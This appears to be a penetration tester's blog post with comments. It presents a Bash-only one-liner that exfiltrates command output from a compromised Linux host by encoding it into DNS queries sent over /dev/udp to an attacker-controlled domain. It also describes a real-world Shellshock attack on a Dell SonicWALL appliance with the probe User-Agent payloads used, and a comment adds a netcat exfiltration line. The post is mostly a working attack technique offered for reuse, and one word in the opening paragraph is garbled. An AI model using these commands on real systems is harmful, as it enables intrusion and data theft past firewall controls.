Bash data exfiltration through DNS (using bash builtin functions)

After gaining ‘blind’ command execution access to a compromised Linux host, data exfiltration can be difficult when the system ibinbash2s protected by a firewall. Sometimes these firewalls prevent the compromised host to establish connections to the internet. In these cases, data exfiltration through the DNS-protocol can be useful. In a lot of cases DNS-queries are not blocked by a firewall.  I’ve had a real life situation like this, which i will describe later on.

There are several oneliners on the internet available to exfiltrate command output through DNS. However, i noticed that these are using Linux applications (xxd, od, hexdump, etc), which are not always present on a minimalistic target system. I decided to create a oneliner, which is only using Bash builtin functionalities. The oneliner can be used whenever command execution is possible and Bash is installed on the compromised system.

I’ve created the following bash command line which can be used on the attacked system to execute commands and send the results through DNS:

(LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1)

In order to use it, first modify the name servers of your domain, point them to the ip-address of the attacker machine. Also two values in the above oneliner need to be changed. The variable “LINE” needs to contain the command to execute, for example “ls -l /”. Also the variable “domain” needs to be modified, replace it with the domain which is pointed to your attacker machine. On the attacker machine, the following server side ruby script can be started:
dns.rb

The script will retrieve the output of the executed command. The following screenshot shows the command executed on a targeted system:

dns_client3

This screenshot shows the retrieved data by the attacker, using the dns.rb script:

dns_server

There might be improvements possible to the oneliner and script to make it more efficient. Or there might be some cases where the oneliner doesn’t work. Do not hesitate to comment on this blog if you have an improvement.

Real life scenario

I stumbled on a Dell SonicWALL Secure Remote Access (SRA) appliance which was vulnerable to Shellshock. I discovered this by sending the following user-agent, which returned a 200 HTTP response.

User-agent: () { :; }; /bin/ls

sslvpn_200

When sending a user-agent with a non-existing binary, it returned a 500 HTTP response, which indicates something went wrong (it cannot execute the defined binary):

User-agent () { :;}; /bin/fake

sslvpn_500

I was able to execute commands using the Shellshock vulnerability (confirmed by running /bin/sleep 60), however it was not responding with the command output on commands like ‘ls’. I discovered that all outgoing connections to the internet were blocked by the machine, only the DNS protocol was allowed, by resolving a hostname using the telnet executable. The appliance did not have any executables like xxd, hexdump etc. Therefor i decided to create the above line, which is not depending on these utilities, so can be used on any system containing Bash.

Dell is already aware of the Shellshock vulnerability in the older firmware versions of SRA. More details on how to patch the issue can be found at:
https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series

4 thoughts on “Bash data exfiltration through DNS (using bash builtin functions)

    1. J Phani Mahesh

      The devices under /dev/udp and /dev/tcp are bash features. No actual devices of the kind exist, but attempting to write to paths under it from bash using output redirection creates TCP or UDP connections.

      Reply
  1. JaneBlack

    I think nc (cat ls.txt | nc -u domain.com 53.) is more useful than your onliner except using the bash builtin utilities. Some of unix servers don’t have nc though. it’s a nc of bash version 😉

    Reply
    1. wez3 Post author

      Netcat is very useful. However, if outgoing connections to the internet are blocked, it is useful to exfiltrate data through the DNS server on the local network. Also Netcat needs to be available of course.

      I created the oneliner to bypass the firewall and program requirements, like Netcat.

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *